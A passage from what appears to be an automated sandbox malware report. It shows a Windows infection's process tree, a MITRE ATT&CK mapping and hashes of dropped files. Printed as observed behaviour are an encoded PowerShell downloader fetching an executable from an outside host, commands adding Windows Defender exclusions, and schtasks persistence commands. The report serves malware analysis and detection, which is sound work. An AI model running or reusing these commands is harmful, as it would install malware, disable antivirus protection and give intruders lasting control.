B3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQAuAGEAcABwAC8AUwB5AHMAdABlAG0AUwBlAHQAdABpAG4AZwBzAC4AZQB4AGUAJwAsACAAPAAjAGcAeQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBwAG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgB2AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAdABlAG0AUwBlAHQAdABpAG4AZwBzAC4AZQB4AGUAJwApACkAPAAjAHcAZwBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAawBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGIAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGEAcwBrAGgAbwBzAHQAdwAuAGIAYQB0ACcAKQA8ACMAYgBtAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBiAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAaQBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AdABvAHMAawByAG4AbAAuAGUAeABlACcAKQA8ACMAcAB5AHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAeABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcABwAC4AZQB4AGUAJwApADwAIwBmAGcAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHAAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegB0AGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAdABlAG0ALgBlAHgAZQAnACkAPAAjAHAAZQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHgAegBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBoAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AG8AbwBsAC4AZQB4AGUAJwApADwAIwBwAGQAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbQB3AGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBpAG0AcABsAGUALgBlAHgAZQAnACkAPAAjAGgAeQBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAagBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAHcAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB2AHAAcwAuAGUAeABlACcAKQA8ACMAcgB3AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB2AGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAZABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAHQAZQBtAFMAZQB0AHQAaQBuAGcAcwAuAGUAeABlACcAKQA8ACMAdQB4AGoAIwA+AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
- C:\Users\Admin\AppData\Roaming\SystemSettings.exe
  "C:\Users\Admin\AppData\Roaming\SystemSettings.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\SystemSettings.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Users\Admin\AppData\Roaming\SystemSettings.exe
      "C:\Users\Admin\AppData\Roaming\SystemSettings.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcQBxACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
    - - C:\Users\Admin\AppData\Roaming\Simple.exe
        
        "C:\Users\Admin\AppData\Roaming\Simple.exe"
        5⤵
        Executes dropped EXE
        
        PID:1112
- C:\Users\Admin\AppData\Roaming\taskhostw.exe
  "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Users\Admin\AppData\Roaming\taskhostw.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcwBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAcgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAbQBlACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4324
      - C:\ProgramData\Simple.exe
        
        "C:\ProgramData\Simple.exe"
        6⤵
        Executes dropped EXE
        
        PID:3220
        
        C:\Users\Admin\AppData\Roaming\splwow64.exe
        
        "C:\Users\Admin\AppData\Roaming\splwow64.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
    - - C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4396
      - C:\ProgramData\SecurityHealthSystray.exe
        
        "C:\ProgramData\SecurityHealthSystray.exe"
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:2952
    - - C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3352
      - C:\ProgramData\Seting.exe
        
        "C:\ProgramData\Seting.exe"
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAZABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwB4ACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:708
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\powershell.vbs"
        7⤵
        Blocklisted process makes network request
        
        PID:4316
        
        C:\Users\Admin\AppData\Roaming\Registry Editor.exe
        
        "C:\Users\Admin\AppData\Roaming\Registry Editor.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3624
        
        C:\Users\Admin\AppData\Roaming\ship.exe
        
        "C:\Users\Admin\AppData\Roaming\ship.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\Security.exe
        
        "C:\Users\Admin\AppData\Roaming\Security.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4192
        
        C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2812
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2280
        
        C:\Users\Admin\AppData\Roaming\ntoskrn.exe
        
        "C:\Users\Admin\AppData\Roaming\ntoskrn.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:508
        
        C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
        
        "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\dow.exe
        
        "C:\Users\Admin\AppData\Local\dow.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3124
    - - C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1604
      - C:\ProgramData\WindowsSecurity.exe
        
        "C:\ProgramData\WindowsSecurity.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
        7⤵
        
        PID:5864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
        7⤵
        
        PID:3640
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\ProgramData\WindowsSecurity.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:5820
    - - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        5⤵
        Executes dropped EXE
        
        PID:2748
      - C:\ProgramData\tab.exe
        
        "C:\ProgramData\tab.exe"
        6⤵
        Executes dropped EXE
        
        PID:1912
    - - C:\Users\Admin\AppData\Local\Temp\ko.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ko.exe"
        5⤵
        Executes dropped EXE
        
        PID:4428
- C:\Users\Admin\AppData\Roaming\VM.exe
  "C:\Users\Admin\AppData\Roaming\VM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 768
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- C:\Users\Admin\SecurityHealthSystray.exe
  "C:\Users\Admin\SecurityHealthSystray.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe" "C:\Users\Admin\SecurityHealthSystray.exe"
    3⤵
    - Executes dropped EXE
    PID:2800

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2600

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\ProgramData\SecurityHealthSystray.exe"
1⤵
- Executes dropped EXE
PID:4328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAegBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBpACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\Users\Admin\AppData\Roaming\Protected.exe
"C:\Users\Admin\AppData\Roaming\Protected.exe"
1⤵
PID:3124
- C:\Windows\svchost.exe
  "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\dow.exe"
  2⤵
  - Executes dropped EXE
  PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcQBxACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
"C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1788
- C:\Windows\svchost.exe
  "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
  2⤵
  - Executes dropped EXE
  PID:4404

C:\Users\Admin\AppData\Roaming\Simple.exe
"C:\Users\Admin\AppData\Roaming\Simple.exe"
1⤵
- Executes dropped EXE
PID:3104

C:\Users\Admin\AppData\Roaming\Seting.exe
"C:\Users\Admin\AppData\Roaming\Seting.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:928
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Seting" /tr '"C:\Users\Admin\AppData\Local\Temp\%Windows%\Seting.exe"' & exit
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Seting" /tr '"C:\Users\Admin\AppData\Local\Temp\%Windows%\Seting.exe"'
      4⤵
      Creates scheduled task(s)
      PID:5396

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\ship.exe"
1⤵
- Executes dropped EXE
PID:4268

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
1⤵
- Executes dropped EXE
PID:4468

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\Security.exe"
1⤵
- Executes dropped EXE
PID:1012

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
1⤵
- Executes dropped EXE
PID:4244

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Roaming\ntoskrn.exe"
1⤵
- Executes dropped EXE
PID:4572

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5536

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5828

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5936

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:244

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5600

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5300

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5276

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5248

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5772

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:4628

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:6104

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:436

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:3944

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:4160

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5300

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5276

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5244

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
- Executes dropped EXE
PID:5796

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:1788

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:3392

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:2688

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:1020

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:5988

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:708

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:4912

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:3508

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:5468

C:\ProgramData\WindowsSecurity.exe
C:\ProgramData\WindowsSecurity.exe
1⤵
PID:5128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SecurityHealthSystray.exe

Filesize
84KB

MD5
2c250441fccd11807ff8c5014fb3b067

SHA1
d12e98802f53fb7b9a68d9482b0190c6ceb677be

SHA256
7fd0e2f3e61a3fc5e7f140a73472f53cb36e5d84cca630a6eac6d78efdf682da

SHA512
b92a84a30aa8919d519a53e99841961bef2ab2815769d83555d3b8d773757952b341171cd0340c7704892f150ea83009b8bcd481f1fbaada7b79918330f5e8c2

Download Submit
C:\ProgramData\SecurityHealthSystray.exe

Filesize
64KB

MD5
143eb1438ac56711c34429364b438aef

SHA1
984faabd32c2f725f72169bc50a847d29e0c66ba

SHA256
fd869e1741c74a9b40befcb4adbaeb19a7f0e0786a3e834e1fc2b0b70e670376

SHA512
b787b4c578e7939900bf06bf316a1a38fbb8a28e1625276f2a7a5995087a7b434eadc66712a9cf9ce65db91af0e37ffe8d35340e53f7edd1f0d3c772192f1ec5

Download Submit
C:\ProgramData\Seting.exe

Filesize
266KB

MD5
41c68d3de103a12c46caaaec7ae38440

SHA1
79ab62050508f362548f74fe9657f65fef5913fc

SHA256
d3c802a22e075bd3f9ee2028946d818b0bb344c38158be364f8d122123ac40e2

SHA512
56c5bd6a96692d3440131e5f9f5eb60c97a7fd79fcdd8de61f568625d0f3a89b62af1801298cfc2b03d5cd24b900559affa31b30a5e73686342bd5107612bbb9

Download Submit
C:\ProgramData\Seting.exe

Filesize
194KB

MD5
e6980665ffc9c43bc09743812107ed05

SHA1
ae96295cb84c825fa4dbdff03e2c3e1f10d664fd

SHA256
0f3afdbd9c6f3c0445360f9a2685ba6523484ed9306c8b72495e6875cc7fe8d8

SHA512
8aa0f3762521d8438c749d1ca6219e3ce1c89cdf853358513e189a1b68066e2ba27f639bdd00b8e90fe7813519deb25122d77ee62785e4776442fd91b1e80220

Download Submit
C:\ProgramData\Simple.exe

Filesize
46KB

MD5
3c2e17088548b55111816e21c9fbdbb6

SHA1
30d17c3bf0c8e82491636a0c7c787ac5cb379bbf

SHA256
95a7d4bb94e45775afff3ce80036a599c96a4700ee35f0a2537fa1b4c81a882f

SHA512
2bcad21a7be448df0ea24d53c2099c230b32feca70e286491d70d64f5a4ccaaabcc9ca2b4b85ef64fa2e116ef4fe72b87067fe8bea222141bfc5dda55799b896

Download Submit
C:\ProgramData\Simple.exe

Filesize
32KB

MD5
dbd4ada7d756a2636e08b315b72908b8

SHA1
18ee48f2fb8fa693329cccc36576b4eb1c0e5509

SHA256
9d9a1d0685e04645c57f29e82f7ec980004451565688b06e51d23adec89f35dc

SHA512
295acc8fad8f1e74fb8fe0c6bedc5c20092242992559af385a72895eb4556353a359f64e750c71233c1a9a9ab422f2e2594843b38d5926946680e0919486a126

Download Submit
C:\ProgramData\Simple.exe

Filesize
2.6MB

MD5
a7b42ab267e294fa3191b4571235bf5b

SHA1
00038cd192daff3d4ec3ce6e5e6097be3b813ea1

SHA256
a2e0aacb8151248f48458233e247306fa7b897decde2c4c81464c70889829412

SHA512
de69bb5f55aa7db74b96dfa2621eac0a8b2444289187a769558452c5c527fbe8941cec88278793fdd91b4b2d15b8f8b8a89b64d45960c207b6399268da7418db

Download Submit
C:\ProgramData\WindowsSecurity.exe

Filesize
115KB

MD5
d3f7778e7e8bc35d3c116450131cc420

SHA1
37f273f5e9ecea9711be583353065b0ca2447b87

SHA256
2a40920613f821475521a00dff2f306f88c40a1e0c0cdc71e95fe73a21f881b0

SHA512
d28def3f1a4d56dc57f824e299ef50474e1cbb682952557598142b3ce10ef26e6464878669efa90e65853011a41150cda092ae20e33ede88baf5bf4ba13d5608

Download Submit
C:\ProgramData\WindowsSecurity.exe

Filesize
171KB

MD5
a5457f8022e401b04c454746596b4e0a

SHA1
55e609ae09e13dd8db6c3f1d8a4b6e9cf35ce427

SHA256
d495f3d47376f44a732243f758e09e33c515e65d8668e696fc193512dd318ecb

SHA512
4eb84c6236cc9a709056ba79d5e4885031a5ca5e85696e5e90755a147a1455b6a9b9c33334ae68ebd3e2bc3d22ab86382c379221897bad572a543924f2dd15aa

Download Submit
C:\ProgramData\tab.exe

Filesize
162KB

MD5
116dd0451250d8faa0af4d18a4e4cb0f

SHA1
9ec305273e9c3ce12df3b29378034d8e21683a98

SHA256
85694fea8ac4d9edd5cd64e561ad8b1c2c50878fc701c10f2ef4e7e72e71fcae

SHA512
775218af6f8e69cb0ae94fee286e499d2cd8f283f8a666ef4f7b5bb65a9a2d55bc3052d843841dd6aafacaf33119d2cf8fa1392171440799d492c3160b89f011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Simple.exe.log

Filesize
654B

MD5
16c5fce5f7230eea11598ec11ed42862

SHA1
75392d4824706090f5e8907eee1059349c927600

SHA256
87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

SHA512
153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
482KB

MD5
fdb0545d1500b7699dcfdd8b18ba3eac

SHA1
b8b77a32cdb13a8a9cd6579c6866195a612a0ae8

SHA256
544d30673ef450b4a20d21063b5a61c6d3ac6f6fd3ecb99725548fd0b2dd6f52

SHA512
0397c84a8b70131b093dd42ad317dcec9e3f65867e28df335cfca47209e14ea48fedf4de69dac8718ca2d65aad340c69dc857bede673acee02d6e37987a2e159

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
20KB

MD5
2ef4c0ea92f4e725aa69061ff0465f4b

SHA1
baade8cf3c3b210b27b1c4571142c2d84f110062

SHA256
d7b74796c41b257401a4c5067dffaf2810845c2ba16d96a0404c21d6d5c33572

SHA512
ef01110be6ba572e50b4f629bd230ec90e1973a49fe69b64224bb67b8847a89c6b07981ae73549db34b25e1a9c047abb1febf7980cd914ef0f12ff1b3c238190

Download Submit
